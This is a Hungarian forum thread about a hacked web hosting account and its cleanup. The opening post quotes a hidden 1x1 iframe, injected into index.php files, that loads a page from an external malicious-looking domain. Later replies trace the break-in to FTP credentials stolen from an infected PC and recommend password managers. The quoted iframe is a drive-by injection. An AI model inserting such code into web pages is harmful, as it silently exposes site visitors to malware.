Feltört webtárhely

Anonymous képe

Ma reggel az egyik ügyfelem [tárhelyszolgáltató neve törölve] tárhelyén ezt találtam az index.php fáljok elején:

<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe>

Először gzip tömörítési problémára gyanakodtam, mert a címlapot lekérve ilyen hibaüzenetek jöttek:

Chrome: 330net::ERR_CONTENT_DECODING_FAILED
Safari: cannot decode raw data” (CFURLErrorDomain:-1015)

Közben kiderült, hogy a tárhelyet nyilvánvalóan feltörték, és a fenti kódot szúrták be az index.php elejére. Elképzelhető, hogy a látszólagos tömörítési probléma mögött is a feltörés áll, bár nem kizárt, hogy két külön problémával állunk szemben.

Ha náluk van a webhelyed, szedd ki a fenti iframe kódot az index.php elejéről, és jelezd a problémát az ügyfélszolgálatnak.

Illyés Edit képe

Úgy tűnik Joomlákat is törtek, tehát biztosan nem Drupal probléma.

0
0
Illyés Edit képe

Újabb fejlemények: ügyfél Windows Vista gépe a hétvégén beszedett valami vírust, és le volt tárolva a FileZillában a jelszó. Lehet (valószínű), hogy innen indult a betörés, és nem a tárhelyszolgáltató szerveréről.

Tanulságok: a FileZilla 3-as, hasonlóan más FTP programokhoz, kódolatlanul, egyszerű xml fájoklban tárolja a jelszavakat és más bejelentkezési információkat. (Ez megváltozott, a 2-esben még megvolt a kódolás.) Windows gépeken ez különösen problematikus. Ne mentsük le a jelszavakat, ez a legegyszerűbb megoldás.

0
0
hosszu.kalman képe

Jelszavak tárolására én a KeePassX nevű szoftvert használom. Van linux-ra, mac-re, windows-ra és opensource.

0
0
aboros képe

én a 1password alkalmazást használom pont ugyan erre. nincs linuxra és nem openszorsz viszont most nézem, van androidra is. :)

0
0

-
clear: both;

rych képe

KeePassX-hez androidos kliens: KeePassDroid.

0
0
aboros képe

perfektli overprajszd, cserebe kapod, hogy anbelivebli bjutiful. a drodios verzio annyira nem erint, gondoltam masnak fontos lehet.

0
0

-
clear: both;

aries képe

vot káind ov dájaelekt duju szpik? :)

0
0
elod képe

Igen, sajnos ismert és elég gyakori is a probléma:
http://blog.webpozitiv.hu/bejelentett-tamado-webhely-mit-tegyek/

0
0